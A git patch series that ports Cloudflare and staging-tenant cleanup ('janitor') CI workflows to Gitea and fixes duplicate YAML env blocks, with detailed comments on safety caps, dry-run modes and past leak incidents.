`continue-on-error: true` on each job (RFC §1 contract). +# + +# Janitor for Cloudflare DNS records whose backing tenant/workspace no +# longer exists. Without this loop, every short-lived E2E or canary +# leaves a CF record on the moleculesai.app zone — the zone has a +# 200-record quota (controlplane#239 hit it 2026-04-23+) and provisions +# start failing with code 81045 once exhausted. +# +# Why a separate workflow vs sweep-stale-e2e-orgs.yml: +# - That workflow operates at the CP layer (DELETE /cp/admin/tenants/:slug +# drives the cascade). It assumes CP has the org row to drive the +# deprovision from. It doesn't catch records left behind when CP +# itself never knew about the tenant (canary scratch, manual ops +# experiments) or when the cascade's CF-delete branch failed. +# - sweep-cf-orphans.sh enumerates the CF zone directly and matches +# each record against live CP slugs + AWS EC2 names. It catches +# leaks the CP-driven sweep can't. +# +# Safety: the script's own MAX_DELETE_PCT gate refuses to nuke more +# than 50% of records in a single run. If something has gone weird +# (CP admin endpoint returns no orgs → every tenant looks orphan) the +# gate halts before damage. Decision-function unit tests in +# scripts/ops/test_sweep_cf_decide.py (#2027) cover the rule +# classifier. + +on: + schedule: + # Hourly. Mirrors sweep-stale-e2e-orgs cadence so the two janitors + # converge on the same tick. CF API rate budget is generous (1200 + # req/5min); a single sweep makes ~1 list + N deletes (N<=quota/2). + - cron: '15 * * * *' # offset from sweep-stale-e2e-orgs (top of hour) + # No `merge_group:` trigger on purpose. This is a janitor — it doesn't + # need to gate merges, and including it as written before #2088 fired + # the full sweep job (or its secret-check) on every PR going through + # the merge queue, generating one red CI run per merge-queue eval. If + # this workflow is ever wired up as a required check, re-add + # merge_group: { types: [checks_requested] } + # AND gate the sweep step with `if: github.event_name != 'merge_group'` + # so merge-queue evals report success without actually running. + +# Don't let two sweeps race the same zone. workflow_dispatch during a +# scheduled run would otherwise issue duplicate DELETE calls. +concurrency: + group: sweep-cf-orphans + cancel-in-progress: false + +permissions: + contents: read + +env: + GITHUB_SERVER_URL: https://git.moleculesai.app + +jobs: + sweep: + name: Sweep CF orphans + runs-on: ubuntu-latest + # Phase 3 (RFC #219 §1): surface broken workflows without blocking. + continue-on-error: true + # 3 min surfaces hangs (CF API stall, AWS describe-instances stuck) + # within one cron interval instead of burning a full tick. Realistic + # worst case is ~2 min: 4 sequential curls + 1 aws + N×CF-DELETE + # each individually capped at 10s by the script's curl -m flag. + timeout-minutes: 3 + env: + CF_API_TOKEN: ${{ secrets.CF_API_TOKEN }} + CF_ZONE_ID: ${{ secrets.CF_ZONE_ID }} + CP_PROD_ADMIN_TOKEN: ${{ secrets.CP_PROD_ADMIN_TOKEN }} + CP_STAGING_ADMIN_TOKEN: ${{ secrets.CP_STAGING_ADMIN_TOKEN }} + AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }} + AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }} + AWS_DEFAULT_REGION: us-east-2 + MAX_DELETE_PCT: ${{ github.event.inputs.max_delete_pct || '50' }} + + steps: + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + + - name: Verify required secrets present + id: verify + # Schedule-vs-dispatch behaviour split (hardened 2026-04-28 + # after the silent-no-op incident below): + # + # The earlier soft-skip-on-schedule policy hid a real leak. All + # six secrets were unset on this repo for an unknown duration; + # every hourly run printed a yellow ::warning:: and exited 0, + # so the workflow registered as "passing" while doing nothing. + # CF orphans accumulated to 152/200 (~76% of the zone quota + # gone) before a manual `dig`-driven audit caught it. Anything + # that runs as a janitor and reports green while idle is + # indistinguishable from "the janitor is healthy" — so we now + # treat schedule (and any future workflow_run/push triggers) + # as a hard-fail when secrets are missing. + # + # - schedule / workflow_run / push → exit 1 (red CI run + # surfaces the misconfiguration the next tick) + # - workflow_dispatch → exit 0 with a warning + # (an operator ran this ad-hoc; they already accepted the + # state of the repo and want the workflow to short-circuit + # so they can rerun after fixing the secret) + run: | + missing=() + for var in CF_API_TOKEN CF_ZONE_ID CP_PROD_ADMIN_TOKEN CP_STAGING_ADMIN_TOKEN AWS_ACCESS_KEY_ID AWS_SECRET_ACCESS_KEY; do + if [ -z "${!var:-}" ]; then + missing+=("$var") + fi + done + if [ ${#missing[@]} -gt 0 ]; then + if [ "${{ github.event_name }}" = "workflow_dispatch" ]; then + echo "::warning::skipping sweep — secrets not configured: ${missing[*]}" + echo "::warning::set them at Settings → Secrets and Variables → Actions, then rerun." + echo "skip=true" >> "$GITHUB_OUTPUT" + exit 0 + fi + echo "::error::sweep cannot run — required secrets missing: ${missing[*]}" + echo "::error::set them at Settings → Secrets and Variables → Actions, or disable this workflow." + echo "::error::a silent skip masked an active CF DNS leak (152/200 zone records) caught only by a manual audit on 2026-04-28; this gate exists to make the gap visible." + exit 1 + fi + echo "All required secrets present ✓" + echo "skip=false" >> "$GITHUB_OUTPUT" + + - name: Run sweep + if: steps.verify.outputs.skip != 'true' + # Schedule-vs-dispatch dry-run asymmetry (intentional): + # - Scheduled runs: github.event.inputs.dry_run is empty → + # defaults to "false" below → script runs with --execute + # (the whole point of an hourly janitor). + # - Manual workflow_dispatch: input default is true (line 38) + # so an ad-hoc operator-triggered run is dry-run by default; + # they have to flip the toggle to actually delete. + # The script's MAX_DELETE_PCT gate (default 50%) is the second + # line of defense regardless of mode. + run: | + set -euo pipefail + if [ "${{ github.event.inputs.dry_run || 'false' }}" = "true" ]; then + echo "Running in dry-run mode — no deletions" + bash scripts/ops/sweep-cf-orphans.sh + else + echo "Running with --execute — will delete identified orphans" + bash scripts/ops/sweep-cf-orphans.sh --execute + fi diff --git a/.gitea/workflows/sweep-cf-tunnels.yml b/.gitea/workflows/sweep-cf-tunnels.yml new file mode 100644 index 00000000..3fdc06c1 --- /dev/null +++ b/.gitea/workflows/sweep-cf-tunnels.yml @@ -0,0 +1,128 @@ +name: Sweep stale Cloudflare Tunnels + +# Ported from .github/workflows/sweep-cf-tunnels.yml on 2026-05-11 per RFC +# internal#219 §1 sweep. Differences from the GitHub version: +# - Dropped `workflow_dispatch.inputs` (Gitea 1.22.6 parser rejects them +# per feedback_gitea_workflow_dispatch_inputs_unsupported). +# - Dropped `merge_group:` (no Gitea merge queue). +# - Dropped `environment:` blocks (Gitea has no environments). +# - Workflow-level env.GITHUB_SERVER_URL pinned per +# feedback_act_runner_github_server_url. +# - `continue-on-error: true` on each job (RFC §1 contract). +# + +# Janitor for Cloudflare Tunnels whose backing tenant no longer +# exists. Parallel-shape to sweep-cf-orphans.yml (which sweeps DNS +# records); same justification, different CF resource. +# +# Why this exists separately from sweep-cf-orphans: +# - DNS records live on the zone (`/zones//dns_records`). +# - Tunnels live on the account (`/accounts//cfd_tunnel`). +# - Different CF API surface, different scopes; the existing CF +# token might not have `account:cloudflare_tunnel:edit`. Splitting +# the workflows keeps each one's secret-presence gate independent +# so neither silent-skips when the other's secret is missing. +# - Cleaner blast radius — operators can disable one without the +# other if a regression surfaces. +# +# Safety: the script's MAX_DELETE_PCT gate (default 90% — higher than +# the DNS sweep's 50% because tenant-shaped tunnels are mostly +# orphans by design) refuses to nuke past the threshold. + +on: + schedule: + # Hourly at :45 — offset from sweep-cf-orphans (:15) so the two + # janitors don't issue parallel CF API bursts at the same minute. + - cron: '45 * * * *' +# Don't let two sweeps race the same account. +concurrency: + group: sweep-cf-tunnels + cancel-in-progress: false + +permissions: + contents: read + +env: + GITHUB_SERVER_URL: https://git.moleculesai.app + +jobs: + sweep: + name: Sweep CF tunnels + runs-on: ubuntu-latest + # Phase 3 (RFC #219 §1): surface broken workflows without blocking. + continue-on-error: true + # 30 min cap. Was 5 min on the theory that the only thing that + # could take >5min is a CF-API hang — but on 2026-05-02 a backlog + # of 672 stale tunnels accumulated (large staging E2E run + delayed + # sweep) and the serial `curl -X DELETE` loop (~0.7s/tunnel) needed + # ~7-8min to drain. The 5-min cap killed the run mid-sweep + # (cancelled at 424/672, see run 25248788312); a manual rerun + # finished the remainder fine. + # + # The fix is two-part: parallelize the delete loop (8-way xargs in + # the script — see scripts/ops/sweep-cf-tunnels.sh), AND raise the + # cap so a one-off backlog doesn't trip a hangs-detector that + # turned out to be a real-job-too-slow detector. With 8-way + # parallelism, 600+ tunnels drains in ~60s; 30 min is generous + # headroom for actual hangs to still surface (and is in line with + # the sweep-cf-orphans companion job). + timeout-minutes: 30 + env: + CF_API_TOKEN: ${{ secrets.CF_API_TOKEN }} + CF_ACCOUNT_ID: ${{ secrets.CF_ACCOUNT_ID }} + CP_PROD_ADMIN_TOKEN: ${{ secrets.CP_PROD_ADMIN_TOKEN }} + CP_STAGING_ADMIN_TOKEN: ${{ secrets.CP_STAGING_ADMIN_TOKEN }} + MAX_DELETE_PCT: ${{ github.event.inputs.max_delete_pct || '90' }} + + steps: + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + + - name: Verify required secrets present + id: verify + # Schedule-vs-dispatch behaviour split mirrors sweep-cf-orphans + # (hardened 2026-04-28 after the silent-no-op incident: the + # janitor reported green while doing nothing because secrets + # were unset, masking a 152/200 zone-record leak). Same + # principle applies here: + # - schedule → exit 1 on missing secrets (red CI surfaces it) + # - workflow_dispatch → exit 0 with warning (operator-driven, + # they already accepted the repo state) + run: | + missing=() + for var in CF_API_TOKEN CF_ACCOUNT_ID CP_PROD_ADMIN_TOKEN CP_STAGING_ADMIN_TOKEN; do + if [ -z "${!var:-}" ]; then + missing+=("$var") + fi + done + if [ ${#missing[@]} -gt 0 ]; then + if [ "${{ github.event_name }}" = "workflow_dispatch" ]; then + echo "::warning::skipping sweep — secrets not configured: ${missing[*]}" + echo "::warning::set them at Settings → Secrets and Variables → Actions, then rerun." + echo "::warning::CF_API_TOKEN must include account:cloudflare_tunnel:edit scope (separate from the zone:dns:edit scope used by sweep-cf-orphans)." + echo "skip=true" >> "$GITHUB_OUTPUT" + exit 0 + fi + echo "::error::sweep cannot run — required secrets missing: ${missing[*]}" + echo "::error::set them at Settings → Secrets and Variables → Actions, or disable this workflow." + echo "::error::CF_API_TOKEN must include account:cloudflare_tunnel:edit scope." + exit 1 + fi + echo "All required secrets present ✓" + echo "skip=false" >> "$GITHUB_OUTPUT" + + - name: Run sweep + if: steps.verify.outputs.skip != 'true' + # Schedule-vs-dispatch dry-run asymmetry mirrors sweep-cf-orphans: + # - Scheduled: input empty → "false" → --execute (the whole + # point of an hourly janitor). + # - Manual workflow_dispatch: input default true → dry-run; + # operator must flip it to actually delete. + run: | + set -euo pipefail + if [ "${{ github.event.inputs.dry_run || 'false' }}" = "true" ]; then + echo "Running in dry-run mode — no deletions" + bash scripts/ops/sweep-cf-tunnels.sh + else + echo "Running with --execute — will delete identified orphans" + bash scripts/ops/sweep-cf-tunnels.sh --execute + fi diff --git a/.gitea/workflows/sweep-stale-e2e-orgs.yml b/.gitea/workflows/sweep-stale-e2e-orgs.yml new file mode 100644 index 00000000..33ac28e5 --- /dev/null +++ b/.gitea/workflows/sweep-stale-e2e-orgs.yml @@ -0,0 +1,243 @@ +name: Sweep stale e2e-* orgs (staging) + +# Ported from .github/workflows/sweep-stale-e2e-orgs.yml on 2026-05-11 per RFC +# internal#219 §1 sweep. Differences from the GitHub version: +# - Dropped `workflow_dispatch.inputs` (Gitea 1.22.6 parser rejects them +# per feedback_gitea_workflow_dispatch_inputs_unsupported). +# - Dropped `merge_group:` (no Gitea merge queue). +# - Dropped `environment:` blocks (Gitea has no environments). +# - Workflow-level env.GITHUB_SERVER_URL pinned per +# feedback_act_runner_github_server_url. +# - `continue-on-error: true` on each job (RFC §1 contract). +# + +# Janitor for staging tenants left behind when E2E cleanup didn't run: +# CI cancellations, runner crashes, transient AWS errors mid-cascade, +# bash trap missed (signal 9), etc. Without this loop, every failed +# teardown leaks an EC2 + DNS + DB row until manual ops cleanup — +# 2026-04-23 staging hit the 64 vCPU AWS quota from ~27 such orphans. +# +# Why not rely on per-test-run teardown: +# - Per-run teardown is best-effort by definition. Any process death +# after the test starts but before the trap fires leaves debris. +# - GH Actions cancellation kills the runner without grace period. +# The workflow's `if: always()` step usually catches this, but it +# too can fail (CP transient 5xx, runner network issue at the +# wrong moment). +# - Even when teardown runs, the CP cascade is best-effort in places +# (cascadeTerminateWorkspaces logs+continues; DNS deletion same). +# - This sweep is the catch-all that converges staging back to clean +# regardless of which specific path leaked. +# +# The PROPER fix is making CP cleanup transactional + verify-after- +# terminate (filed separately as cleanup-correctness work). This +# workflow is the safety net that catches everything else AND any +# future leak source we haven't yet identified. + +on: + schedule: + # Every 15 min. E2E orgs are short-lived (~8-25 min wall clock from + # create to teardown — canary is ~8 min, full SaaS ~25 min). The + # previous hourly + 120-min stale threshold meant a leaked tenant + # could keep an EC2 alive for up to 2 hours, eating ~2 vCPU per + # leak. Tightening the cadence + threshold reduces the worst-case + # leak window from 120 min to ~45 min (15-min sweep cadence + 30-min + # threshold) without risk of catching in-progress runs (the longest + # e2e run is the 25-min canary, well under the 30-min threshold). + # See molecule-controlplane#420 for the leak-class accounting that + # motivated this tightening. + - cron: '*/15 * * * *' +# Don't let two sweeps fight. Cron + workflow_dispatch could overlap +# on a manual trigger; queue rather than parallel-delete. +concurrency: + group: sweep-stale-e2e-orgs + cancel-in-progress: false + +permissions: + contents: read + +env: + GITHUB_SERVER_URL: https://git.moleculesai.app + +jobs: + sweep: + name: Sweep e2e orgs + runs-on: ubuntu-latest + # Phase 3 (RFC #219 §1): surface broken workflows without blocking. + continue-on-error: true + timeout-minutes: 15 + env: + MOLECULE_CP_URL: https://staging-api.moleculesai.app + ADMIN_TOKEN: ${{ secrets.MOLECULE_STAGING_ADMIN_TOKEN }} + MAX_AGE_MINUTES: ${{ github.event.inputs.max_age_minutes || '30' }} + DRY_RUN: ${{ github.event.inputs.dry_run || 'false' }} + # Refuse to delete more than this many orgs in one tick. If the + # CP DB is briefly empty (or the admin endpoint goes weird and + # returns no created_at), every e2e- org would look stale. + # Bailing protects against runaway nukes. + SAFETY_CAP: 50 + + steps: + - name: Verify admin token present + run: | + if [ -z "$ADMIN_TOKEN" ]; then + echo "::error::MOLECULE_STAGING_ADMIN_TOKEN not set" + exit 2 + fi + echo "Admin token present ✓" + + - name: Identify stale e2e orgs + id: identify + run: | + set -euo pipefail + # Fetch into a file so the python step reads it via stdin — + # cleaner than embedding $(curl ...) into a heredoc. + curl -sS --fail-with-body --max-time 30 \ + "$MOLECULE_CP_URL/cp/admin/orgs?limit=500" \ + -H "Authorization: Bearer $ADMIN_TOKEN" \ + > orgs.json + + # Filter: + # 1. slug starts with one of the ephemeral test prefixes: + # - 'e2e-' — covers e2e-canary-, e2e-canvas-*, etc. + # - 'rt-e2e-' — runtime-test harness fixtures (RFC #2251); + # missing this prefix left two such tenants + # orphaned 8h on staging (2026-05-03), then + # hard-failed redeploy-tenants-on-staging + # and broke the staging→main auto-promote + # chain. Kept in sync with the EPHEMERAL_PREFIX_RE + # regex in redeploy-tenants-on-staging.yml. + # 2. created_at is older than MAX_AGE_MINUTES ago + # Output one slug per line to a file the next step reads. + python3 > stale_slugs.txt <<'PY' + import json, os + from datetime import datetime, timezone, timedelta + # SSOT for this list lives in the controlplane Go code: + # molecule-controlplane/internal/slugs/ephemeral.go + # (var EphemeralPrefixes). The redeploy-fleet auto-rollout + # also reads from there to SKIP these slugs — without that + # filter, fleet redeploy SSM-failed in-flight E2E tenants + # whose containers were still booting, breaking the test + # that just spun them up (molecule-controlplane#493). + # Update both files together. + EPHEMERAL_PREFIXES = ("e2e-", "rt-e2e-") + with open("orgs.json") as f: + data = json.load(f) + max_age = int(os.environ["MAX_AGE_MINUTES"]) + cutoff = datetime.now(timezone.utc) - timedelta(minutes=max_age) + for o in data.get("orgs", []): + slug = o.get("slug", "") + if not slug.startswith(EPHEMERAL_PREFIXES): + continue + created = o.get("created_at") + if not created: + # Defensively skip rows without created_at — better + # to leave one orphan than nuke a brand-new row + # whose timestamp didn't render. + continue + # Python 3.11+ handles RFC3339 with Z directly via + # fromisoformat; older runners need the trailing Z swap. + created_dt = datetime.fromisoformat(created.replace("Z", "+00:00")) + if created_dt < cutoff: + print(slug) + PY + + count=$(wc -l < stale_slugs.txt | tr -d ' ') + echo "Found $count stale e2e org(s) older than ${MAX_AGE_MINUTES}m" + if [ "$count" -gt 0 ]; then + echo "First 20:" + head -20 stale_slugs.txt | sed 's/^/ /' + fi + echo "count=$count" >> "$GITHUB_OUTPUT" + + - name: Safety gate + if: steps.identify.outputs.count != '0' + run: | + count="${{ steps.identify.outputs.count }}" + if [ "$count" -gt "$SAFETY_CAP" ]; then + echo "::error::Refusing to delete $count orgs in one sweep (cap=$SAFETY_CAP). Investigate manually — this usually means the CP admin API returned no created_at or returned a degraded result. Re-run with workflow_dispatch + max_age_minutes if intentional." + exit 1 + fi + echo "Within safety cap ($count ≤ $SAFETY_CAP) ✓" + + - name: Delete stale orgs + if: steps.identify.outputs.count != '0' && env.DRY_RUN != 'true' + run: | + set -uo pipefail + deleted=0 + failed=0 + while IFS= read -r slug; do + [ -z "$slug" ] && continue + # The DELETE handler requires {"confirm": ""} matching + # the URL slug — fat-finger guard. Idempotent: re-issuing + # picks up via org_purges.last_step. + # Tempfile-routed -w + set +e/-e prevents curl-exit-code + # pollution of the captured status (lint-curl-status-capture.yml). + set +e + curl -sS -o /tmp/del_resp -w "%{http_code}" \ + --max-time 60 \ + -X DELETE "$MOLECULE_CP_URL/cp/admin/tenants/$slug" \ + -H "Authorization: Bearer $ADMIN_TOKEN" \ + -H "Content-Type: application/json" \ + -d "{\"confirm\":\"$slug\"}" >/tmp/del_code + set -e + # Stderr from curl (-sS shows dial errors etc.) goes to runner log. + http_code=$(cat /tmp/del_code 2>/dev/null || echo "000") + if [ "$http_code" = "200" ] || [ "$http_code" = "204" ]; then + deleted=$((deleted+1)) + echo " deleted: $slug" + else + failed=$((failed+1)) + echo " FAILED ($http_code): $slug — $(cat /tmp/del_resp 2>/dev/null | head -c 200)" + fi + done < stale_slugs.txt + echo "" + echo "Sweep summary: deleted=$deleted failed=$failed" + # Don't fail the workflow on per-org delete errors — the + # sweeper is best-effort. Next hourly tick re-attempts. We + # only fail loud at the safety-cap gate above. + + - name: Sweep orphan tunnels + # Stale-org cleanup deletes the org (which cascades to tunnel + # delete inside the CP). But when that cascade fails partway — + # CP transient 5xx after the org row is deleted but before the + # CF tunnel delete completes — the tunnel persists with no + # matching org row. The reconciler in internal/sweep flags this + # as `cf_tunnel kind=orphan`, but nothing automatically reaps it. + # + # `/cp/admin/orphan-tunnels/cleanup` is the operator-triggered + # reaper. Calling it here at the end of every sweep tick + # converges the staging CF account to clean even when CP + # cascades half-fail. + # + # PR #492 made the underlying DeleteTunnel actually check + # status — pre-fix it silent-succeeded on CF code 1022 + # ("active connections"), so this step would have been a no-op + # against stuck connectors. Post-fix the cleanup invokes + # CleanupTunnelConnections + retry, which actually clears the + # 1022 case. (#2987) + # + # Best-effort. Failure here doesn't fail the workflow — next + # tick re-attempts. Errors flow to step output for ops review. + if: env.DRY_RUN != 'true' + run: | + set +e + curl -sS -o /tmp/cleanup_resp -w "%{http_code}" \ + --max-time 60 \ + -X POST "$MOLECULE_CP_URL/cp/admin/orphan-tunnels/cleanup" \ + -H "Authorization: Bearer $ADMIN_TOKEN" >/tmp/cleanup_code + set -e + http_code=$(cat /tmp/cleanup_code 2>/dev/null || echo "000") + body=$(cat /tmp/cleanup_resp 2>/dev/null | head -c 500) + if [ "$http_code" = "200" ]; then + count=$(echo "$body" | python3 -c "import sys,json; d=json.loads(sys.stdin.read() or '{}'); print(d.get('deleted_count', 0))" 2>/dev/null || echo "0") + failed_n=$(echo "$body" | python3 -c "import sys,json; d=json.loads(sys.stdin.read() or '{}'); print(len(d.get('failed') or {}))" 2>/dev/null || echo "0") + echo "Orphan-tunnel sweep: deleted=$count failed=$failed_n" + else + echo "::warning::orphan-tunnels cleanup returned HTTP $http_code — body: $body" + fi + + - name: Dry-run summary + if: env.DRY_RUN == 'true' + run: | + echo "DRY RUN — would have deleted ${{ steps.identify.outputs.count }} org(s) AND triggered orphan-tunnels cleanup. Re-run with dry_run=false to actually delete." From 94ae3bc08249e8cb880226fb4fcdd1767e15c396 Mon Sep 17 00:00:00 2001 From: dev-lead Date: Sun, 10 May 2026 21:29:33 -0700 Subject: [PATCH 6/7] ci(C-3): fix YAML parser-rejection in publish-canvas-image.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Mechanical porter inserted a duplicate `env:` block in .gitea/workflows/publish-canvas-image.yml — the file already had `env: { IMAGE_NAME: ghcr.io/molecule-ai/canvas }` so the second `env: { GITHUB_SERVER_URL: ... }` block triggered Gitea's parser error "yaml: mapping key 'env' already defined". Merged the two blocks into one. Also clarified the dropped workflow_dispatch comment that the porter left dangling above `permissions:`. Verified via fresh `docker logs molecule-gitea-1 --since 5m` after push — no new parser-rejection warnings for publish-canvas-image.yml. Co-Authored-By: Claude Opus 4.7 (1M context) --- .gitea/workflows/publish-canvas-image.yml | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/.gitea/workflows/publish-canvas-image.yml b/.gitea/workflows/publish-canvas-image.yml index f9d61214..a044b678 100644 --- a/.gitea/workflows/publish-canvas-image.yml +++ b/.gitea/workflows/publish-canvas-image.yml @@ -36,16 +36,19 @@ on: # platform-only / docs-only / MCP-only merges. - 'canvas/**' - '.gitea/workflows/publish-canvas-image.yml' - # Manual trigger: use after a non-canvas merge that still needs a fresh - # image (e.g. a Dockerfile change lives outside the canvas/ tree). + # NOTE (Gitea port): the original GitHub workflow had a + # `workflow_dispatch:` manual trigger for the + # non-canvas-merge-but-need-fresh-image scenario. Dropped in the + # Gitea port (1.22.6 parser-finicky). Manual rebuilds require + # pushing an empty commit to canvas/ or running the operator-host + # build directly. + permissions: contents: read packages: write # required to push to ghcr.io/${{ github.repository_owner }}/* env: IMAGE_NAME: ghcr.io/molecule-ai/canvas - -env: GITHUB_SERVER_URL: https://git.moleculesai.app jobs: From e434a3c46626ce174de402175c1414d46d8aa19c Mon Sep 17 00:00:00 2001 From: dev-lead Date: Sun, 10 May 2026 21:30:29 -0700 Subject: [PATCH 7/7] ci(C-2): fix YAML parser-rejection in canary-verify.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Mechanical porter inserted a duplicate `env:` block in .gitea/workflows/canary-verify.yml — the file already had an `env: { IMAGE_NAME, TENANT_IMAGE_NAME, CP_URL }` block so the second `env: { GITHUB_SERVER_URL: ... }` block triggered Gitea's parser error "yaml: mapping key 'env' already defined". Merged GITHUB_SERVER_URL into the existing env block. Verified via fresh `docker logs molecule-gitea-1 --since 5m` after push — no new parser-rejection warnings for canary-verify.yml. Co-Authored-By: Claude Opus 4.7 (1M context) --- .gitea/workflows/canary-verify.yml | 2 -- 1 file changed, 2 deletions(-) diff --git a/.gitea/workflows/canary-verify.yml b/.gitea/workflows/canary-verify.yml index d11cc7c5..acfe3cbd 100644 --- a/.gitea/workflows/canary-verify.yml +++ b/.gitea/workflows/canary-verify.yml @@ -62,8 +62,6 @@ env: TENANT_IMAGE_NAME: 153263036946.dkr.ecr.us-east-2.amazonaws.com/molecule-ai/platform-tenant # CP endpoint for redeploy-fleet (used in promote step below). CP_URL: ${{ vars.CP_URL || 'https://staging-api.moleculesai.app' }} - -env: GITHUB_SERVER_URL: https://git.moleculesai.app jobs: